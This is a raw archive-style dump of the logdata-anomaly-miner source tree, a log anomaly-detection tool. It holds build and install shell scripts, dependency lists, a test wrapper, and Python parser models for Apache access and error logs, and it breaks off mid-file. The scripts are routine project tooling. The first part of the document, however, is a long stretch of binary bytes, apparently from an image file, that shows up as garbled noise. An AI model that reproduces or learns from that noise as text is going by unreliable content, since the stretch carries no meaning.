j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”8'W_ ;֫?dcM."./{-PYr`/!+R?2A-p1W7to4.?VZ[h{>a7w9=eðm'Ê騢ϪJ (WoI௏62%VZ4!F=р%2y#I*)AEٕ8~ |gvGew8ʶ i郸NwN{P~kYCyeqݤ)p{85b4'\+o][Mԃ=q =(!=sϥmy_#6>K;}B+Y㹷CG4.WůFMRw-/푥tcG%TX63q/kI̚Vڬ[ 1Skjokr8+i?Ѧ?G+o 7ͥؖڊ ǘݷ>lo/ jhk[Uu?ixW/Rկ.tYd !">ՙWzgNk>~>gɏ >V\կu2]]3'5x'_ =2o޼_iV %!n_ |=ivZmƣ{&v[D*N'T87+?jk>8j$|Mjm\E RK"7ꪬI&hzh;Ixve`bSx";:k[$r2xe<c@׭S7X _[`qq^yR 7TU3:˭g>>gɓ,>ouҨ}??1_| wNDw?j'͏{ OoWu~VIiqh::V ƾ(O-j+ xr#? OO>&Rl'3K?qVE׍xY%wާ'%Tc00C@.s6:m.'Kxՙ觉4o 4@=a@XdSKAY} ,sc_O*D~fW_o%~ -JԯҿJ`[/2Oy%CW?!ӿnme/.r@sEW% ~]'\_~-sA 6E4I=]?ŭ>S-@rі6e? Sj$:OKPe~|'$,i'$|_ 7_!(~ +_03뿳 $iڤ\4PSb-"n1޼w5_M2J $nG^=Ͼ۽OTu8/Zݡ%Pѱssqh?ᵼ@<zFֳg?k _^s RVUw,=")?|A?|A_Df,~w 7K$2(#q) _%}Qq2ey.|;c,3|mE?:J?d-1 l8eZExs +)_}@Q@|pCZBczMyWu?6)6<9x|7rFzV5x1aYx,0ؐWS_DG'I^@, mcƲC'HHnqW >d_@ZDAX<+_3 [OWR(~,+oCƿ}7?:$˂yzg{Z+D=|s$jӿEƫéY'oqE"VQ]]Eck5#2H碨'Ϳ\).YxApF}G_^?< MFdMHo۷~+hQǔ7-gh3N=O__ᯋ fItQap(>+|Huk'yLV!}̣ WԟW?=_4|⿊z. ifX/1S>`:o ??uh?Ac:[|Y5;157! 8[aBOڽ~Ο=VH-d#O W w %F?Z|Oai 7|pCZoH}uKOrGX߲7{g>|`_:;ǥFe2 F1 o}@IUZq7_D=Dkɘ~5⿱񗈓'iRGbD׷ԟB|MnUxE#1ho'$6f è0k>xk0Ȗbβ$3(rE}F=?$c,-CYQ |4xGÞ9&[Zc+ArJ2~ x-B}#R/X`ކe,o ??uh/]?7$']J0y  Ɋg]dr3QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW_O*}mXF;o^d?]kuZ{I}w3sŎ7D=ɠ.| /QxT;9HrH*sF]h7VIn<9etpJh?ko/+M}  [|+_uKvZkZEG]2 ^݅|+x_V69[M]A{s}?R 7TU~ е-F-C\[ItInbYXv"_{U~xI>]]H8=Pn{Wn#KsӃ׼Pʿ׃]0N7i,N :9>[+k)2Bk| mC]Aϖ0>D@g?Ue7lqyv0} Ѿ$:OKV݅]bkx^Q)^i@/o(SQ`ҿJ`[/žhks/0^a٩KK+xV9!B'P?G?? \臯~*|~/ç&- `d0e* wXVÿ٣Ÿ mumc2&Sqlë΀>rjG_kW.5Xͳ=!ebTQ^@Q@|pCZ^YP#{Q2A F䏏Oƹ_4>MHkYRNٛ$a (Oۋ@اI^aDhl,mumF'Q@j᎓4S[KpN+rU/jş%~2-z櫩I,,.hJ`>yя?Je`[w_졚4-.QC+)=A޾~~&hk #4T` FriR<#p_!PTd8T `is^$5I<$%dR&xs%,/cY֯x-Űbw1ހ8/Ʒ&]չfHpI9J΋"2:V*FASFѬ|=imvV6# ORI&>'02@\ .цsܯ#Ծm.@ cn63߭zoxG}3]xÕ>Z4}+ղC'o΀=CRp4xl W _ov~ty㰞9[2rQ F3<߰S)uYmV#ؗ|~UKკm<.ƿ2b;z(?쁚+jokrg_?^xW[u,\F".[qX @_!~?1_&־;3,'.5 i7*davs7{g>xbBLi ;p;3I Ҭx6><4ezdkv H#gK%[SO|9Ut{FuK)?*؋G_=b9e/ xSi ,k uQڹ_;GngBTpu}. oJӮo*Qԫ~玡c|f;.̂C}Ԑ~u3\x{^Z܈0·lГԣF{#|!R ĺ|RcB#ip6}híoCvdEg01^]~útw. 'K%,W=:6⫻ȁ`$}K>?*vNUL 2>NUL if errorlevel 9009 ( echo. echo.The 'sphinx-build' command was not found. Make sure you have Sphinx echo.installed, then set the SPHINXBUILD environment variable to point echo.to the full path of the 'sphinx-build' executable. Alternatively you echo.may add the Sphinx directory to PATH. echo. echo.If you don't have Sphinx installed, grab it from echo.http://sphinx-doc.org/ exit /b 1 ) %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% goto end :help %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% :end popd logdata-anomaly-miner-2.6.1/docs/requirements.txt000066400000000000000000000000631437606560100221240ustar00rootroot00000000000000sphinx==3.5.1 sphinx_rtd_theme==0.5.1 recommonmark logdata-anomaly-miner-2.6.1/docs/setup.sh000077500000000000000000000006151437606560100203420ustar00rootroot00000000000000#!/bin/bash case "$1" in "install") ln -s ../README.md ln -s ../SECURITY.md ln -s ../LICENSE LICENSE.md git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git ../Wiki ;; "uninstall") unlink README.md unlink SECURITY.md unlink LICENSE.md test -d ../Wiki && rm -rf ../Wiki ;; *) echo "usage: $0 " exit 1 ;; esac logdata-anomaly-miner-2.6.1/requirements.txt000066400000000000000000000003141437606560100211730ustar00rootroot00000000000000scipy==1.5.4 pylibacl==0.5.4 kafka_python==2.0.2 pytz==2020.4 urllib3==1.26.5 numpy==1.22.0 Cerberus==1.3.2 psutil==5.7.3 kafka==1.3.5 pyzmq==20.0.0 python_dateutil==2.8.1 PyYAML==5.4 statsmodels==0.12.2 logdata-anomaly-miner-2.6.1/scripts/000077500000000000000000000000001437606560100174005ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/scripts/addbuildid.sh000077500000000000000000000012651437606560100220300ustar00rootroot00000000000000#!/bin/sh METAPATH="source/root/usr/lib/logdata-anomaly-miner/metadata.py" DOCSCONF="docs/conf.py" # fallback if git is not installed if [ ! `command -v git` ] then echo "Git is not installed. Won't set the BUILD_ID" exit 1 fi BUILD_ID=`git describe --tags --long 2> /dev/null` # fallback if this is not a git installation if [ $? -ne 0 ] then echo "This seems not to be a git installation." exit 0 fi BUILD_ID=`echo $BUILD_ID | sed 's/^[Vv]//'` echo "BUILD_ID: $BUILD_ID" if [ -e $METAPATH ] then sed -i "s/__version__\s*=\s*\".*\"/__version__ = \"$BUILD_ID\"/g" $METAPATH fi if [ -e $DOCSCONF ] then sed -i "s/release\s*=\s*'.*'/release = '$BUILD_ID'/g" $DOCSCONF fi exit 0 logdata-anomaly-miner-2.6.1/scripts/aminer_install.sh000077500000000000000000000037561437606560100227530ustar00rootroot00000000000000#!/bin/bash # if set to 1 this installer will delete the # source directory after installation DELDIR=1 BRANCH="main" URL="https://github.com/ait-aecid/logdata-anomaly-miner.git" AMINERDST=`mktemp -d` AMINERSRC=0 DISON=0 help() { echo "Usage: $0 [-h] [-b BRANCH] [-u GITURL] [-s LOCAL_GITREPO_PATH] [-d DIRECTORY]" 1>&2 } while getopts "hb:u:s:d:" options; do case "${options}" in b) BRANCH=${OPTARG} ;; h) help exit 1 ;; u) URL=${OPTARG} ;; s) AMINERSRC=${OPTARG} DELDIR=0 if [ ! -d $AMINERSRC ] then echo "Local Git-Repository $AMINERSRC does not exist." exit 1 fi ;; d) DISON=1 AMINERDST=${OPTARG} if [ -d $AMINERDST ] then echo "This directory($AMINERDST) already exists. Please remove it first" exit 1 fi DELDIR=0 ;; :) echo "$0: Must supply an argument to -$OPTARG." >&2 exit 1 ;; esac done if [ -e /etc/debian_version ] then SUDO=`which sudo` if [ $? -ne 0 ] then echo "Please install and configure sudo first" exit 1 fi sudo /usr/bin/apt-get update sudo DEBIAN_FRONTEND=nointeractive /usr/bin/apt-get install -y -q ansible git else echo "Currently only debian based distributions are supported" exit 1 fi if [ $AMINERSRC -eq 0 ] then git clone -b $BRANCH $URL $AMINERDST else if [ $DISON -eq 1 ] then cp -rap $AMINERSRC $AMINERDST else AMINERDST=$AMINERSRC fi fi cd $AMINERDST test -d roles || mkdir roles git clone -b $BRANCH https://github.com/ait-aecid/aminer-ansible roles/aminer cat > playbook.yml << EOF - hosts: localhost vars: aminer_gitrepo: False # We assume that we cloned the aminer to /home/developer/aminer aminer_repopath: "${AMINERDST}" roles: - aminer EOF # Use this command to deploy the aminer-files # You can add your changes in the aminer-directory # and repeatedly execute this command to deploy # your changes sudo ansible-playbook playbook.yml if [ $DELDIR -eq 1 ] then test -d $AMINERDST && rm -rf $AMINERDST fi exit 0 logdata-anomaly-miner-2.6.1/scripts/aminerwrapper.sh000077500000000000000000000007351437606560100226200ustar00rootroot00000000000000#!/bin/bash AMINERDIR=/usr/lib/logdata-anomaly-miner case "$1" in aminer) $AMINERDIR/aminer.py ${*:2} ;; aminerremotecontrol) $AMINERDIR/aminerremotecontrol.py ${*:2} ;; aminer-persistence) $AMINERDIR/aminer-persistence.py ${*:2} ;; supervisor) /usr/bin/supervisord ;; mkdocs) cd /docs make html ;; *) echo "Usage: [ aminer | aminerremotecontrol | aminer-persistence | supervisor | mkdocs ] " exit 1 ;; esac exit 0 logdata-anomaly-miner-2.6.1/scripts/build_docker.sh000077500000000000000000000004531437606560100223670ustar00rootroot00000000000000#!/bin/bash CONTAINER="docker" test $CONTAINER_PROG && CONTAINER=$CONTAINER_PROG scripts/addbuildid.sh $CONTAINER build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . logdata-anomaly-miner-2.6.1/scripts/create_aminerremotecontrol_wiki.sh000077500000000000000000000124071437606560100264010ustar00rootroot00000000000000cd /usr/share/man/man1/ sudo xsltproc --output /usr/share/man/man1/aminerremotecontrol.1 -''-nonet -''-param man.charmap.use.subset "0" -''-param make.year.ranges "1" -''-param make.single.year.ranges "1" /usr/share/xml/docbook/stylesheet/docbook-xsl/manpages/docbook.xsl /home/user/Documents/Git_projects/logdata-anomaly-miner/debian/aminerremotecontrol.1.xml && sudo gzip /usr/share/man/man1/aminerremotecontrol.1 sudo gunzip /usr/share/man/man1/aminerremotecontrol.1.gz sudo cp /usr/share/man/man1/aminerremotecontrol.1 /tmp sudo chown user:user /tmp/aminerremotecontrol.1 sudo apt install pandoc pandoc --from man --to gfm /tmp/aminerremotecontrol.1 -o /tmp/aminerremotecontrol.md # man-to-github-flawored-markdown # quotes are not successfully recreated from the parser.. sed -i $'s/,property\\\_name/,\'property\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,attribute/,\'attribute\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPath,/\'NewMatchPath\',/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDet)/\'NewMatchPathDet\')/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag,/\'auto\\\_include\\\_flag\',/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag)/\'auto\\\_include\\\_flag\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,old\\\_component\\\_name,/,\'old\\\_component\\\_name\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,new\\\_component\\\_name/,\'new\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,history\\\_component\\\_name/,\'history\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDetector/\'NewMatchPathDetector\'/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\'NewMatchPathDetector\'\*/\*NewMatchPathDetector\*/g' /tmp/aminerremotecontrol.md sed -i $'s/,component\\\_name/,\'component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/AtomFilter/,\'AtomFilter\'/g' /tmp/aminerremotecontrol.md sed -i $'s/LogResourceList/\'LogResourceList\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,atom\\\_handler,/,\'atom\\\_handler\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,destination\\\_file/,\'destination\\\_file\'/g' /tmp/aminerremotecontrol.md sed -i $'s,/tmp/config.py,\'/tmp/config.py\',g' /tmp/aminerremotecontrol.md sed -i $'s/,EnhancedNewMatchPathValueComboDetector,/,\'EnhancedNewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MissingMatchPathValueDetector,/,\'MissingMatchPathValueDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,NewMatchPathValueComboDetector,/,\'NewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s,new/path,\'new/path\',g' /tmp/aminerremotecontrol.md sed -i $'s/,VolatileLogarithmicBackoffEventHistory,/,\'VolatileLogarithmicBackoffEventHistory\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.TargetAddress,/,\'MailAlerting.TargetAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/root@localhost/\'root@localhost\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.FromAddress,/,\'MailAlerting.FromAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.SubjectPrefix,/,\'MailAlerting.SubjectPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/aminer Alerts:)/\'aminer Alerts:\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.EventCollectTime,/,\'MailAlerting.EventCollectTime\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MinAlertGap,/,\'MailAlerting.MinAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxAlertGap,/,\'MailAlerting.MaxAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxEventsPerMessage,/,\'MailAlerting.MaxEventsPerMessage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,LogPrefix,/,\'LogPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/Original log/\'Original log/g' /tmp/aminerremotecontrol.md sed -i $'s/line: /line: \'/g' /tmp/aminerremotecontrol.md sed -i $'s/This defaults to ./This defaults to \'\'./g' /tmp/aminerremotecontrol.md sed -i $'s/,Resources.MaxMemoryUsage,/,\'Resources.MaxMemoryUsage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Core.PersistencePeriod,/,\'Core.PersistencePeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsLevel,/,\'Log.StatisticsLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.DebugLevel,/,\'Log.DebugLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsPeriod,/,\'Log.StatisticsPeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*socket/\*\* \*socket/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*command/\*\* \*command/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*file/\*\* \*file/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*data/\*\* \*data/g' /tmp/aminerremotecontrol.md sed -i $'s/command\*\*\*/command\* \*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/file\*\*\*/file\* \*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\*$//g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\* \*\*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\* \*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*/\*\*/g' /tmp/aminerremotecontrol.md sed -i ':a;N;$!ba;s/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\n\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/g' /tmp/aminerremotecontrol.md logdata-anomaly-miner-2.6.1/scripts/deploydocs.sh000077500000000000000000000012441437606560100221050ustar00rootroot00000000000000#!/usr/bin/bash BRANCH=$1 SOURCE=$2 DEST=$3 case $BRANCH in development) test -d $DEST/development && rm -rf $DEST/development cp -r $SOURCE $DEST/development ;; main) VERSION=$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') if [ $(echo $VERSION | grep -P "\d+\.\d+\.\d+") ] then test -d $DEST/$VERSION && rm -rf $DEST/$VERSION cp -r $SOURCE $DEST/$VERSION test -e $DEST/current && unlink $DEST/current ln -s $DEST/$VERSION $DEST/current else echo "Unable to identify the aminer-version!" exit 1 fi ;; *) echo "usage: $0 main|development" exit 1 ;; esac exit 0 logdata-anomaly-miner-2.6.1/scripts/distritest.sh000066400000000000000000000003241437606560100221310ustar00rootroot00000000000000#!/bin/bash sudo service rsyslog start sudo service apache2 start curl localhost curl -XPOST localhost curl -I localhost sudo timeout --preserve-status 20s aminer --config /home/aminer/gettingStarted-config.yml logdata-anomaly-miner-2.6.1/scripts/prep-docker-compose.sh000077500000000000000000000015501437606560100236160ustar00rootroot00000000000000#!/bin/bash test -d aminercfg || mkdir aminercfg test -d persistency || mkdir persistency test -d persistency/log || mkdir persistency/log test -d logs || mkdir logs test -d akafka || mkdir akafka test -e aminercfg/config.yml || cp -r source/root/etc/aminer/template_config.yml aminercfg/config.yml test -d aminercfg/conf-enabled || mkdir aminercfg/conf-enabled test -e aminercfg/conf-enabled/ApacheAccessModel.py || cp source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py aminercfg/conf-enabled/ApacheAccessModel.py sed -i "s+# - 'unix+ - 'unix+g" aminercfg/config.yml sed -i "s+ - 'file:///var/log/apache2/access.log'+# - 'file:///logs/access.log'+g" aminercfg/config.yml sed -i "s+# RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+g" aminercfg/config.yml logdata-anomaly-miner-2.6.1/scripts/supervisord.conf000066400000000000000000000003711437606560100226350ustar00rootroot00000000000000[supervisord] nodaemon=true pidfile=/var/lib/supervisor/supervisor.pid [unix_http_server] file=/var/lib/supervisor/supervisor.sock [include] files = /etc/supervisor/conf.d/*.conf [program:aminer] command=/usr/lib/logdata-anomaly-miner/aminer.py logdata-anomaly-miner-2.6.1/scripts/testingwrapper.sh000077500000000000000000000066431437606560100230260ustar00rootroot00000000000000#!/bin/bash TESTDIR=/home/aminer/aecid-testsuite if [ $# -gt 0 ] then sudo service rsyslog start sudo service postfix start fi case "$1" in runSuspendModeTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runUnittests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerJsonInputDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerIntegrationTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runCoverageTests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runRemoteControlTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runGettingStarted) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runTryItOut) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnSequenceDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnFrequencyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToMissingMatchPathValueDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToEntropyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runJsonDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerEncodingDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runOfflineMode) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runMypy) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runConfAvailableTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runReleaseStringCheck) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; ALL) cd $TESTDIR ./runMypy.sh ./runReleaseStringCheck.sh ./runSuspendModeTest.sh ./runUnittests.sh ./runRemoteControlTest.sh ./runConfAvailableTest.sh ./runAminerDemo.sh demo/aminer/demo-config.py ./runAminerDemo.sh demo/aminer/jsonConverterHandler-demo-config.py ./runAminerDemo.sh demo/aminer/template_config.py ./runAminerDemo.sh demo/aminer/template_config.yml ./runAminerDemo.sh demo/aminer/demo-config.yml ./runAminerEncodingDemo.sh demo/aminer/demo-config.py ./runAminerEncodingDemo.sh demo/aminer/demo-config.yml ./runAminerJsonInputDemo.sh ./runJsonDemo.sh demo/aminerJsonInputDemo/json-aminer-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-elastic-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-eve-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-journal-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-wazuh-demo.yml ./runAminerIntegrationTest.sh aminerIntegrationTest.sh config.py ./runAminerIntegrationTest.sh aminerIntegrationTest2.sh config21.py config22.py ./runOfflineMode.sh ./runGettingStarted.sh ./runTryItOut.sh ./runHowToCreateYourOwnSequenceDetector.sh ./runHowToCreateYourOwnFrequencyDetector.sh ./runHowToMissingMatchPathValueDetector.sh ./runHowToEntropyDetector.sh ./runCoverageTests.sh exit $? ;; SHELL) bash exit 0 ;; *) echo "Usage: [ ALL | SHELL | runSuspendModeTest | runUnittests | runAminerDemo | runJsonDemo | runAminerJsonInputDemo " echo " runAminerIntegrationTest | runOfflineMode | runCoverageTests | runRemoteControlTest | runTryItOut " echo " runGettingStarted | runHowToCreateYourOwnSequenceDetector | runHowToCreateYourOwnFrequencyDetector" echo " runHowToMissingMatchPathValueDetector | runHowToEntropyDetector | runAminerEncodingDemo | runMypy" echo " runConfAvailableTest | runReleaseStringCheck ] " exit 1 ;; esac exit 0 logdata-anomaly-miner-2.6.1/source/000077500000000000000000000000001437606560100172115ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/000077500000000000000000000000001437606560100201745ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/000077500000000000000000000000001437606560100207475ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/000077500000000000000000000000001437606560100222225ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/000077500000000000000000000000001437606560100250655ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/000077500000000000000000000000001437606560100264225ustar00rootroot00000000000000ApacheAccessParsingModel.py000066400000000000000000000064311437606560100335310ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ FirstMatchModelElement("client_ip", [ SequenceModelElement("client_ip", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), IpAddressDataModelElement("client_ip") ]), SequenceModelElement("localhost", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), FixedDataModelElement("localhost", b"::1") ]), IpAddressDataModelElement("client_ip"), FixedDataModelElement("localhost", b"::1") ]), FixedDataModelElement("sp1", b" "), VariableByteDataModelElement("client_id", alphabet), FixedDataModelElement("sp2", b" "), VariableByteDataModelElement("user_id", alphabet), FixedDataModelElement("sp3", b" ["), DateTimeModelElement("time", b"%d/%b/%Y:%H:%M:%S%z"), FixedDataModelElement("sp4", b'] "'), FirstMatchModelElement("fm", [ FixedDataModelElement("dash", b"-"), SequenceModelElement("request", [ FixedWordlistDataModelElement("method", [ b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH", b"REPORT", b"PROPFIND", b"MKCOL"]), FixedDataModelElement("sp5", b" "), DelimitedDataModelElement("request", b" ", b"\\"), FixedDataModelElement("sp6", b" "), DelimitedDataModelElement("version", b'"'), ]) ]), FixedDataModelElement("sp7", b'" '), DecimalIntegerValueModelElement("status_code"), FixedDataModelElement("sp8", b" "), DecimalIntegerValueModelElement("content_size"), OptionalMatchModelElement( "combined", SequenceModelElement("combined", [ FixedDataModelElement("sp9", b' "'), DelimitedDataModelElement("referer", b'"', b"\\"), FixedDataModelElement("sp10", b'" "'), DelimitedDataModelElement("user_agent", b'"', b"\\"), FixedDataModelElement("sp11", b'"'), ])) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/ApacheErrorParsingModel.py000066400000000000000000000204111437606560100334720ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse Apache Error logs from the AIT-LDS.""" model = FirstMatchModelElement("model", [ FixedDataModelElement("mkdir_failed", b"mkdir failed on directory /var/run/samba/msg.lock: Permission denied"), SequenceModelElement("with_data", [ FixedDataModelElement("sp1", b"["), FixedWordlistDataModelElement("day", [b"Mon", b"Tue", b"Wed", b"Thu", b"Fri", b"Sat", b"Sun"]), FixedDataModelElement("sp2", b" "), DateTimeModelElement("time", b"%b %d %H:%M:%S.%f %Y"), FixedDataModelElement("bracket_str", b"] ["), DelimitedDataModelElement("source", b"]"), FixedDataModelElement("pid_str", b"] [pid "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("bracket_str", b"] "), FirstMatchModelElement("fm", [ SequenceModelElement("client", [ FixedDataModelElement("client_str", b"[client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("client_port"), FirstMatchModelElement("fm", [ SequenceModelElement("php", [ FixedDataModelElement("php", b"] PHP "), FirstMatchModelElement("fphp", [ SequenceModelElement("warning", [ FixedDataModelElement("warning_str", b"Warning: "), FirstMatchModelElement("warning", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function", b")"), FixedDataModelElement("compatible_str", b") should be compatible with "), DelimitedDataModelElement("function2", b")"), FixedDataModelElement("compatible_str", b") in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer")]), SequenceModelElement("system", [ FixedDataModelElement("system_str", b"system(): Cannot execute a blank command in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), AnyByteDataModelElement("warning_msg") ])]), SequenceModelElement("notice", [ FixedDataModelElement("notice_str", b"Notice: Undefined index: "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("sp", b" in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), SequenceModelElement("deprecated", [ FixedDataModelElement("deprecated_str", b"Deprecated: Methods with the same name as their class " b"will not be constructors in a future version of PHP; "), DelimitedDataModelElement("class", b" "), FixedDataModelElement("constructor_str", b" has a deprecated constructor in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), OptionalMatchModelElement("opt", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]), SequenceModelElement("fatal", [ FixedDataModelElement("fatal_str", 